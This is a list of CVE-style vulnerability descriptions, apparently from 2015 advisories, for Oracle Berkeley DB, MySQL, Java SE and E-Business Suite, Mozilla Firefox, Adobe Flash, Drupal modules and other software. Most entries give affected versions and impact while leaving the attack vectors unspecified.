Unspecified vulnerability in the Data Store component in Oracle Berkeley DB 11.2.5.1.29, 11.2.5.2.42, 11.2.5.3.28, and 12.1.6.0.35 allows local users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2015-2583, CVE-2015-2624, CVE-2015-2626, CVE-2015-2640, CVE-2015-2654, CVE-2015-2656, CVE-2015-4754, CVE-2015-4764, CVE-2015-4775, CVE-2015-4776, CVE-2015-4777, CVE-2015-4778, CVE-2015-4781, CVE-2015-4782, CVE-2015-4783, CVE-2015-4784, CVE-2015-4785, CVE-2015-4786, CVE-2015-4787, CVE-2015-4789, and CVE-2015-4790.
Unspecified vulnerability in the Data Store component in Oracle Berkeley DB 11.2.5.1.29, 11.2.5.2.42, 11.2.5.3.28, and 12.1.6.0.35 allows local users to affect integrity and availability via unknown vectors, a different vulnerability than CVE-2015-4774 and CVE-2015-4788.
Unspecified vulnerability in the Data Store component in Oracle Berkeley DB 11.2.5.1.29, 11.2.5.2.42, 11.2.5.3.28, and 12.1.6.0.35 allows local users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2015-2583, CVE-2015-2624, CVE-2015-2626, CVE-2015-2640, CVE-2015-2654, CVE-2015-2656, CVE-2015-4754, CVE-2015-4764, CVE-2015-4775, CVE-2015-4776, CVE-2015-4777, CVE-2015-4780, CVE-2015-4781, CVE-2015-4782, CVE-2015-4783, CVE-2015-4784, CVE-2015-4785, CVE-2015-4786, CVE-2015-4787, CVE-2015-4789, and CVE-2015-4790.
Unspecified vulnerability in the Data Store component in Oracle Berkeley DB 11.2.5.1.29, 11.2.5.2.42, 11.2.5.3.28, and 12.1.6.0.35 allows local users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2015-2583, CVE-2015-2624, CVE-2015-2626, CVE-2015-2640, CVE-2015-2654, CVE-2015-2656, CVE-2015-4754, CVE-2015-4764, CVE-2015-4775, CVE-2015-4776, CVE-2015-4778, CVE-2015-4780, CVE-2015-4781, CVE-2015-4782, CVE-2015-4783, CVE-2015-4784, CVE-2015-4785, CVE-2015-4786, CVE-2015-4787, CVE-2015-4789, and CVE-2015-4790.
Unspecified vulnerability in the Data Store component in Oracle Berkeley DB 11.2.5.1.29, 11.2.5.2.42, 11.2.5.3.28, and 12.1.6.0.35 allows local users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2015-2583, CVE-2015-2624, CVE-2015-2626, CVE-2015-2640, CVE-2015-2654, CVE-2015-2656, CVE-2015-4754, CVE-2015-4764, CVE-2015-4775, CVE-2015-4777, CVE-2015-4778, CVE-2015-4780, CVE-2015-4781, CVE-2015-4782, CVE-2015-4783, CVE-2015-4784, CVE-2015-4785, CVE-2015-4786, CVE-2015-4787, CVE-2015-4789, and CVE-2015-4790.
Unspecified vulnerability in the Data Store component in Oracle Berkeley DB 11.2.5.1.29, 11.2.5.2.42, 11.2.5.3.28, and 12.1.6.0.35 allows local users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2015-2583, CVE-2015-2624, CVE-2015-2626, CVE-2015-2640, CVE-2015-2654, CVE-2015-2656, CVE-2015-4754, CVE-2015-4764, CVE-2015-4776, CVE-2015-4777, CVE-2015-4778, CVE-2015-4780, CVE-2015-4781, CVE-2015-4782, CVE-2015-4783, CVE-2015-4784, CVE-2015-4785, CVE-2015-4786, CVE-2015-4787, CVE-2015-4789, and CVE-2015-4790.
Unspecified vulnerability in the Data Store component in Oracle Berkeley DB 11.2.5.1.29, 11.2.5.2.42, 11.2.5.3.28, and 12.1.6.0.35 allows local users to affect integrity and availability via unknown vectors, a different vulnerability than CVE-2015-4779 and CVE-2015-4788.
Unspecified vulnerability in the Hyperion Common Security component in Oracle Hyperion 11.1.2.2, 11.1.2.3, and 11.1.2.4 allows remote authenticated users to affect availability via unknown vectors related to User Account Update.
Unspecified vulnerability in Oracle MySQL Server 5.6.24 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Partition.
Unspecified vulnerability in Oracle MySQL Server 5.6.24 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Security : Firewall, a different vulnerability than CVE-2015-4767.
Unspecified vulnerability in the Oracle Transportation Management component in Oracle Supply Chain Products Suite 6.1, 6.2, 6.3.0, 6.3.1, 6.3.2, 6.3.3, 6.3.4, 6.3.5, 6.3.6, and 6.3.7 allows remote authenticated users to affect confidentiality via unknown vectors related to Diagnostics.
Unspecified vulnerability in Oracle MySQL Server 5.6.24 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Security : Firewall, a different vulnerability than CVE-2015-4769.
Unspecified vulnerability in Oracle MySQL Server 5.6.25 and earlier allows local users to affect availability via unknown vectors related to Server : Security : Firewall.
Unspecified vulnerability in the Data Store component in Oracle Berkeley DB 11.2.5.1.29, 11.2.5.2.42, 11.2.5.3.28, and 12.1.6.0.35 allows local users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2015-2583, CVE-2015-2624, CVE-2015-2626, CVE-2015-2640, CVE-2015-2654, CVE-2015-2656, CVE-2015-4754, CVE-2015-4775, CVE-2015-4776, CVE-2015-4777, CVE-2015-4778, CVE-2015-4780, CVE-2015-4781, CVE-2015-4782, CVE-2015-4783, CVE-2015-4784, CVE-2015-4785, CVE-2015-4786, CVE-2015-4787, CVE-2015-4789, and CVE-2015-4790.
Unspecified vulnerability in the Oracle Agile PLM component in Oracle Supply Chain Products Suite 9.3.4 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Security.
Unspecified vulnerability in the Oracle Applications DBA component in Oracle E-Business Suite 12.2.3 and 12.2.4 allows remote authenticated users to affect confidentiality via unknown vectors related to Online patching.
Unspecified vulnerability in Oracle MySQL Server 5.6.24 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Memcached.
Unspecified vulnerability in Oracle Java SE 6u95, 7u80, and 8u45 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.
Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Data Quality based on Trillium, a different vulnerability than CVE-2015-0443, CVE-2015-0444, CVE-2015-0445, CVE-2015-0446, CVE-2015-2634, CVE-2015-2635, CVE-2015-2636, and CVE-2015-4758.
Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Data Quality based on Trillium, a different vulnerability than CVE-2015-0443, CVE-2015-0444, CVE-2015-0445, CVE-2015-0446, CVE-2015-2634, CVE-2015-2635, CVE-2015-2636, and CVE-2015-4759.
Unspecified vulnerability in Oracle MySQL Server 5.5.42 and earlier and 5.6.23 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Optimizer.
Unspecified vulnerability in Oracle MySQL Server 5.6.22 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : InnoDB, a different vulnerability than CVE-2015-0439.
Unspecified vulnerability in the RDBMS Security component in Oracle Database Server 12.1.0.2 allows remote attackers to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Data Store component in Oracle Berkeley DB 11.2.5.1.29, 11.2.5.2.42, 11.2.5.3.28, and 12.1.6.0.35 allows local users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2015-2583, CVE-2015-2624, CVE-2015-2626, CVE-2015-2640, CVE-2015-2654, CVE-2015-2656, CVE-2015-4764, CVE-2015-4775, CVE-2015-4776, CVE-2015-4777, CVE-2015-4778, CVE-2015-4780, CVE-2015-4781, CVE-2015-4782, CVE-2015-4783, CVE-2015-4784, CVE-2015-4785, CVE-2015-4786, CVE-2015-4787, CVE-2015-4789, and CVE-2015-4790.
Unspecified vulnerability in the RDBMS Support Tools component in Oracle Database Server 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows local users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Oracle Access Manager component in Oracle Fusion Middleware 11.1.1.7 and 11.1.2.2 allows remote attackers to affect availability via unknown vectors related to Authentication Engine.
Unspecified vulnerability in Oracle Java SE 6u95, 7u80, and 8u45; JRockit R28.3.6; and Java SE Embedded 7u75 and Embedded 8u33 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Security.
Unspecified vulnerability in the Oracle Agile Product Lifecycle Management for Process component in Oracle Supply Chain Products Suite 6.0.0.7, 6.1.0.3, 6.1.1.5, and 6.2.0.0 allows remote authenticated users to affect confidentiality via unknown vectors related to Global Spec Management.
Unspecified vulnerability in the Oracle Endeca Information Discovery Studio component in Oracle Fusion Middleware 2.2.2, 2.3, 2.4, 3.0, and 3.1 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Integrator, a different vulnerability than CVE-2015-2602, CVE-2015-2603, CVE-2015-2604, CVE-2015-2605, and CVE-2015-2606.
Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0, 12.1.1.0, 12.1.2.0, and 12.1.3.0 allows remote attackers to affect integrity via unknown vectors related to Java Server Faces.
Unspecified vulnerability in the Oracle Applications DBA component in Oracle E-Business Suite 12.2.3 allows remote authenticated users to affect confidentiality via unknown vectors related to AD Utilities.
Unspecified vulnerability in the Oracle Applications Framework component in Oracle E-Business Suite 12.2.4 allows remote authenticated users to affect integrity via unknown vectors related to Dialog popup.
Unspecified vulnerability in the RDBMS Partitioning component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Oracle Application Object Library component in Oracle E-Business Suite 11.5.10.2 allows remote authenticated users to affect integrity via unknown vectors related to Help screens.
Unspecified vulnerability in the PeopleSoft Enterprise HCM Candidate Gateway component in Oracle PeopleSoft Products 9.1 and 9.2 allows remote authenticated users to affect confidentiality via unknown vectors related to Security.
Unspecified vulnerability in Oracle MySQL Server 5.5.43 and earlier, and 5.6.23 and earlier, allows remote authenticated users to affect confidentiality via unknown vectors related to Server : Pluggable Auth.
Unspecified vulnerability in Oracle Java SE 7u80 and 8u45 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment.
Unspecified vulnerability in Oracle Java SE 6u95, 7u80, and 8u45, and Java SE Embedded 7u75 and 8u33 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries, a different vulnerability than CVE-2015-2590.
Unspecified vulnerability in Oracle MySQL 5.6.20 and earlier allows remote authenticated users to affect availability via unknown vectors related to Types.
Unspecified vulnerability in Oracle Java SE 7u80 and 8u45 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Deployment.
Unspecified vulnerability in the Oracle Sourcing component in Oracle E-Business Suite 12.1.1, 12.1.2, 12.1.3, 12.2.3, and 12.2.4 allows remote authenticated users to affect confidentiality via unknown vectors related to Bid/Quote creation.
Unspecified vulnerability in Oracle Virtualization Sun Ray Software before 5.4.4 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Web Console.
Multiple unspecified vulnerabilities in TIBCO Spotfire Client and Spotfire Web Player Client in Spotfire Analyst before 5.5.2, 6.0.x before 6.0.3, 6.5.x before 6.5.3, and 7.0.x before 7.0.1; Spotfire Analytics Platform for AWS 6.5 and 7.0.x before 7.0.1; Spotfire Automation Services before 5.5.2, 6.0.x before 6.0.3, 6.5.x before 6.5.3, and 7.0.x before 7.0.1; Spotfire Deployment Kit before 5.5.2, 6.0.x before 6.0.3, 6.5.x before 6.5.3, and 7.0.x before 7.0.1; Spotfire Desktop before 6.5.2 and 7.0.x before 7.0.1; Spotfire Desktop Language Packs 7.0.x before 7.0.1; Spotfire Professional before 5.5.2, 6.0.x before 6.0.3, 6.5.x before 6.5.3, and 7.0.x before 7.0.1; Spotfire Web Player before 5.5.2, 6.0.x before 6.0.3, 6.5.x before 6.5.3, and 7.0.x before 7.0.1; and Silver Fabric Enabler for Spotfire Web Player before 2.1.1 allow remote attackers to execute arbitrary code or obtain sensitive information via unknown vectors.
The nsUnicodeToUTF8::GetMaxLength function in Mozilla Firefox before 41.0 and Firefox ESR 38.x before 38.3 might allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via unknown vectors, related to an "overflow."
The ConvertDialogOptions function in Mozilla Firefox before 41.0 and Firefox ESR 38.x before 38.3 might allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via unknown vectors.
NetworkUtils.cpp in Mozilla Firefox before 41.0 and Firefox ESR 38.x before 38.3 might allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 42.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 42.0 and Firefox ESR 38.x before 38.4 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 41.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 41.0 and Firefox ESR 38.x before 38.3 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
The nsTSubstring::ReplacePrep function in Mozilla Firefox before 40.0, Firefox ESR 38.x before 38.2, and Firefox OS before 2.2 might allow remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors, related to an "overflow."
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 40.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 40.0 and Firefox ESR 38.x before 38.2 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Adobe Flash Player before 13.0.0.302 and 14.x through 18.x before 18.0.0.203 on Windows and OS X and before 11.2.202.481 on Linux, Adobe AIR before 18.0.0.180, Adobe AIR SDK before 18.0.0.180, and Adobe AIR SDK &amp; Compiler before 18.0.0.180 allow attackers to cause a denial of service (NULL pointer dereference) or possibly have unspecified other impact via unknown vectors, a different vulnerability than CVE-2015-3126.
Multiple cross-site scripting (XSS) vulnerabilities in unspecified administration pages in the EntityBulkDelete module 7.x-1.0 for Drupal allow remote attackers to inject arbitrary web script or HTML via unknown vectors involving creating or editing (1) comments, (2) taxonomy terms, or (3) nodes.
Cross-site scripting (XSS) vulnerability in unspecified administration pages in the Petition module 6.x-1.x before 6.x-1.3 for Drupal allows remote authenticated users with the "create petition" permission to inject arbitrary web script or HTML via unknown vectors.
Directory traversal vulnerability in get_file.php in phpMyBackupPro 2.1 through 2.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.  NOTE: this vulnerability exists due to an incomplete fix to CVE-2015-4180.
Directory traversal vulnerability in get_file.php in phpMyBackupPro 2.1 through 2.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.  NOTE: this vulnerability exists due to an incomplete fix to CVE-2009-4050.
SAP Afaria does not properly restrict access to unspecified functionality, which allows remote attackers to obtain sensitive information, gain privileges, or have other unspecified impact via unknown vectors, SAP Security Note 2155690.
QEMU does not properly restrict write access to the PCI config space for certain PCI pass-through devices, which might allow local x86 HVM guests to gain privileges, cause a denial of service (host crash), obtain sensitive information, or possibly have other unspecified impact via unknown vectors.
Unspecified vulnerability in the Business Rules Framework (CRM-BF-BRF) in SAP CRM allows attackers to execute arbitrary code via unknown vectors, aka SAP Security Note 2097534.
Cross-site request forgery (CSRF) vulnerability in Advantech WebAccess before 8.1 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Multiple unspecified vulnerabilities in Google V8 before 4.3.61.21, as used in Google Chrome before 43.0.2357.65, allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
libinfinity before 0.6.6-1 does not validate expired SSL certificates, which allows remote attackers to have unspecified impact via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in the Cloudwords for Multilingual Drupal module before 7.x-2.3 for Drupal allows remote attackers to hijack the authentication of unspecified victims via an unknown menu callback.
Cross-site request forgery (CSRF) vulnerability in the OPAC module before 7.x-2.3 for Drupal allows remote attackers to hijack the authentication of unspecified victims for requests that remove a mapping via unknown vectors.
Multiple unspecified vulnerabilities in Google V8 before 4.2.77.14, as used in Google Chrome before 42.0.2311.90, allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
CA Common Services, as used in CA Client Automation r12.5 SP01, r12.8, and r12.9; CA Network and Systems Management r11.0, r11.1, and r11.2; CA NSM Job Management Option r11.0, r11.1, and r11.2; CA Universal Job Management Agent; CA Virtual Assurance for Infrastructure Managers (aka SystemEDGE) 12.6, 12.7, 12.8, and 12.9; and CA Workload Automation AE r11, r11.3, r11.3.5, and r11.3.6 on UNIX, does not properly validate an unspecified variable, which allows local users to gain privileges via unknown vectors.
The cipherstring parsing code in nss_compat_ossl while in multi-keyword mode does not match the expected set of ciphers for a given cipher combination, which allows attackers to have unspecified impact via unknown vectors.
The nss_parse_ciphers function in libraries/libldap/tls_m.c in OpenLDAP does not properly parse OpenSSL-style multi-keyword mode cipher strings, which might cause a weaker than intended cipher to be used and allow remote attackers to have unspecified impact via unknown vectors.
The snprintf implementation in PostgreSQL before 9.0.20, 9.1.x before 9.1.16, 9.2.x before 9.2.11, 9.3.x before 9.3.7, and 9.4.x before 9.4.2 does not properly handle system-call errors, which allows attackers to obtain sensitive information or have other unspecified impact via unknown vectors, as demonstrated by an out-of-memory error.
Adobe Flash Player before 13.0.0.302 and 14.x through 18.x before 18.0.0.203 on Windows and OS X and before 11.2.202.481 on Linux, Adobe AIR before 18.0.0.180, Adobe AIR SDK before 18.0.0.180, and Adobe AIR SDK &amp; Compiler before 18.0.0.180 allow attackers to cause a denial of service (NULL pointer dereference) or possibly have unspecified other impact via unknown vectors, a different vulnerability than CVE-2015-4429.
Buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.14 and 11.x before 11.0.11 on Windows and OS X allows attackers to execute arbitrary code via unknown vectors.
Research Artisan Lite before 1.18 does not ensure that a user has authenticated, which allows remote attackers to perform unspecified actions via unknown vectors.
Stack-based buffer overflow in asn1_der_decoding in libtasn1 before 4.4 allows remote attackers to have unspecified impact via unknown vectors.
Multiple stack-based buffer overflows in the ib_fill_isqlda function in dbdimp.c in DBD-Firebird before 1.19 allow remote attackers to have unspecified impact via unknown vectors that trigger an error condition, related to binding octets to columns.
Unspecified vulnerability in MyBB (aka MyBulletinBoard) before 1.8.4 has unknown attack vectors related to "Group join request notifications sent to wrong group leaders."
Cross-site request forgery (CSRF) vulnerability in the command line page in Websense TRITON V-Series appliances before 8.0.0 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Multiple cross-site request forgery (CSRF) vulnerabilities in the Personal Email Manager (PEM) in Websense TRITON AP-EMAIL before 8.0.0 allow remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in Websense TRITON AP-EMAIL before 8.0.0 has unknown impact and attack vectors, related to "Autocomplete Enabled."
Unspecified vulnerability in Websense TRITON AP-EMAIL before 8.0.0 has unknown impact and attack vectors, related to port 17703.
Buffer overflow in the nsXMLHttpRequest::AppendToResponseText function in Mozilla Firefox before 39.0, Firefox ESR 31.x before 31.8 and 38.x before 38.1, and Thunderbird before 38.1 might allow remote attackers to cause a denial of service or have unspecified other impact via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 39.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 39.0, Firefox ESR 38.x before 38.1, and Thunderbird before 38.1 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 39.0, Firefox ESR 31.x before 31.8 and 38.x before 38.1, and Thunderbird before 38.1 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 38.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 38.0, Firefox ESR 31.x before 31.7, and Thunderbird before 31.7 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Unspecified vulnerability in Oracle Java SE 6u95, 7u80, and 8u45 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Deployment.
Unspecified vulnerability in the Oracle Transportation Management component in Oracle Supply Chain Products Suite 6.1, 6.2, and 6.3.0 through 6.3.7 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Business Process Automation.
Unspecified vulnerability in Oracle MySQL Server 5.6.24 and earlier allows local users to affect availability via unknown vectors related to Client.
Unspecified vulnerability in Oracle Java SE 8u45 and Java SE Embedded 8u33 allows remote attackers to affect availability via unknown vectors related to Security.
Unspecified vulnerability in the Oracle Transportation Management component in Oracle Supply Chain Products Suite 6.1, 6.2, and 6.3.0 through 6.3.7 allows remote authenticated users to affect confidentiality via unknown vectors related to Business Process Automation.
Unspecified vulnerability in the Data Store component in Oracle Berkeley DB 11.2.5.1.29, 11.2.5.2.42, 11.2.5.3.28, and 12.1.6.0.35 allows local users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2015-2583, CVE-2015-2624, CVE-2015-2626, CVE-2015-2640, CVE-2015-2654, CVE-2015-4754, CVE-2015-4764, CVE-2015-4775, CVE-2015-4776, CVE-2015-4777, CVE-2015-4778, CVE-2015-4780, CVE-2015-4781, CVE-2015-4782, CVE-2015-4783, CVE-2015-4784, CVE-2015-4785, CVE-2015-4786, CVE-2015-4787, CVE-2015-4789, and CVE-2015-4790.
Unspecified vulnerability in the Application Express component in Oracle Database Server before 4.2.3.00.08 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Data Store component in Oracle Berkeley DB 11.2.5.1.29, 11.2.5.2.42, 11.2.5.3.28, and 12.1.6.0.35 allows local users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2015-2583, CVE-2015-2624, CVE-2015-2626, CVE-2015-2640, CVE-2015-2656, CVE-2015-4754, CVE-2015-4764, CVE-2015-4775, CVE-2015-4776, CVE-2015-4777, CVE-2015-4778, CVE-2015-4780, CVE-2015-4781, CVE-2015-4782, CVE-2015-4783, CVE-2015-4784, CVE-2015-4785, CVE-2015-4786, CVE-2015-4787, CVE-2015-4789, and CVE-2015-4790.
Unspecified vulnerability in the Oracle Commerce Guided Search / Oracle Commerce Experience Manager component in Oracle Commerce Platform 3.1.1, 3.1.2, 11.0, and 11.1 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Content Acquisition System.
Unspecified vulnerability in the Oracle Marketing component in Oracle E-Business Suite 11.5.10.2, 12.0.6, 12.1.1, 12.1.2, 12.1.3, 12.2.3, and 12.2.4 allows remote attackers to affect integrity via unknown vectors related to Web Management.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.53 and 8.54 allows remote authenticated users to affect confidentiality via unknown vectors related to Multichannel Framework.
Unspecified vulnerability in the Enterprise Manager for Oracle Database component in Oracle Enterprise Manager Grid Control EM Base Platform 11.1.0.1; EM Plugin for DB 12.1.0.5, 12.1.0.6, 12.1.0.7; and EM DB Control 11.1.0.7, 11.2.0.3, and 11.2.0.4 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Content Management.
Unspecified vulnerability in the Enterprise Manager for Oracle Database component in Oracle Enterprise Manager Grid Control EM Base Platform: 11.1.0.1; EM Plugin for DB: 12.1.0.5, 12.1.0.6, 12.1.0.7; EM DB Control: 11.1.0.7, 11.2.0.3, and 11.2.0.4 allows remote attackers to affect integrity via unknown vectors related to Content Management.
Unspecified vulnerability in the Oracle Web Applications Desktop Integrator component in Oracle E-Business Suite 11.5.10.2, 12.0.6, 12.1.3, 12.2.3, and 12.2.4 allows remote authenticated users to affect integrity via unknown vectors.
Unspecified vulnerability in the Oracle Agile PLM Framework component in Oracle Supply Chain Products Suite 9.3.3 allows remote attackers to affect confidentiality via unknown vectors related to Security.
Unspecified vulnerability in Oracle MySQL Server 5.5.43 and earlier and 5.6.24 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Optimizer.
Unspecified vulnerability in Oracle Sun Solaris 10 and 11.2 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Gzip.
Unspecified vulnerability in Oracle MySQL Server 5.6.24 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Security : Privileges.
Unspecified vulnerability in the Data Store component in Oracle Berkeley DB 11.2.5.1.29, 11.2.5.2.42, 11.2.5.3.28, and 12.1.6.0.35 allows local users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2015-2583, CVE-2015-2624, CVE-2015-2626, CVE-2015-2654, CVE-2015-2656, CVE-2015-4754, CVE-2015-4764, CVE-2015-4775, CVE-2015-4776, CVE-2015-4777, CVE-2015-4778, CVE-2015-4780, CVE-2015-4781, CVE-2015-4782, CVE-2015-4783, CVE-2015-4784, CVE-2015-4785, CVE-2015-4786, CVE-2015-4787, CVE-2015-4789, and CVE-2015-4790.
Unspecified vulnerability in Oracle MySQL Server 5.6.24 and earlier allows remote authenticated users to affect integrity via unknown vectors related to Server : Security : Firewall.
Unspecified vulnerability in Oracle Java SE 6u95, 7u80, and 8u45; JavaFX 2.2.80; and Java SE Embedded 7u75 and 8u33 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.
Unspecified vulnerability in Oracle Java SE 6u95, 7u80, and 8u45; JavaFX 2.2.80; and Java SE Embedded 7u75 and 8u33 allows remote attackers to affect confidentiality via unknown vectors related to 2D.
Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Data Quality based on Trillium, a different vulnerability than CVE-2015-0443, CVE-2015-0444, CVE-2015-0445, CVE-2015-0446, CVE-2015-2634, CVE-2015-2635, CVE-2015-4758, and CVE-2015-4759.
Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Data Quality based on Trillium, a different vulnerability than CVE-2015-0443, CVE-2015-0444, CVE-2015-0445, CVE-2015-0446, CVE-2015-2634, CVE-2015-2636, CVE-2015-4758, and CVE-2015-4759.
Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Data Quality based on Trillium, a different vulnerability than CVE-2015-0443, CVE-2015-0444, CVE-2015-0445, CVE-2015-0446, CVE-2015-2635, CVE-2015-2636, CVE-2015-4758, and CVE-2015-4759.
Unspecified vulnerability in the Enterprise Manager Ops Center component in Oracle Enterprise Manager Grid Control 12.1.0.1 and 12.2.2 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Ops Center.
Unspecified vulnerability in Oracle Java SE 6u95, 7u80, and 8u45 allows remote attackers to affect confidentiality via unknown vectors related to 2D.
Unspecified vulnerability in Oracle Sun Solaris 10 and 11.2 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to rmformat.
Unspecified vulnerability in the Technology stack component in Oracle E-Business Suite 11.5.10.2, 12.0.6, and 12.1.3 allows remote attackers to affect integrity via unknown vectors related to Applet startup.
Unspecified vulnerability in the Java VM component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2015-0457.
Unspecified vulnerability in Oracle Java SE 6u95, 7u80, and 8u45 allows remote attackers to affect confidentiality via unknown vectors related to installation.
Unspecified vulnerability in the Data Store component in Oracle Berkeley DB 11.2.5.1.29, 11.2.5.2.42, 11.2.5.3.28, and 12.1.6.0.35 allows local users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2015-2583, CVE-2015-2624, CVE-2015-2640, CVE-2015-2654, CVE-2015-2656, CVE-2015-4754, CVE-2015-4764, CVE-2015-4775, CVE-2015-4776, CVE-2015-4777, CVE-2015-4778, CVE-2015-4780, CVE-2015-4781, CVE-2015-4782, CVE-2015-4783, CVE-2015-4784, CVE-2015-4785, CVE-2015-4786, CVE-2015-4787, CVE-2015-4789, and CVE-2015-4790.
Unspecified vulnerability in the Data Store component in Oracle Berkeley DB 11.2.5.1.29, 11.2.5.2.42, 11.2.5.3.28, and 12.1.6.0.35 allows local users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2015-2583, CVE-2015-2626, CVE-2015-2640, CVE-2015-2654, CVE-2015-2656, CVE-2015-4754, CVE-2015-4764, CVE-2015-4775, CVE-2015-4776, CVE-2015-4777, CVE-2015-4778, CVE-2015-4780, CVE-2015-4781, CVE-2015-4782, CVE-2015-4783, CVE-2015-4784, CVE-2015-4785, CVE-2015-4786, CVE-2015-4787, CVE-2015-4789, and CVE-2015-4790.
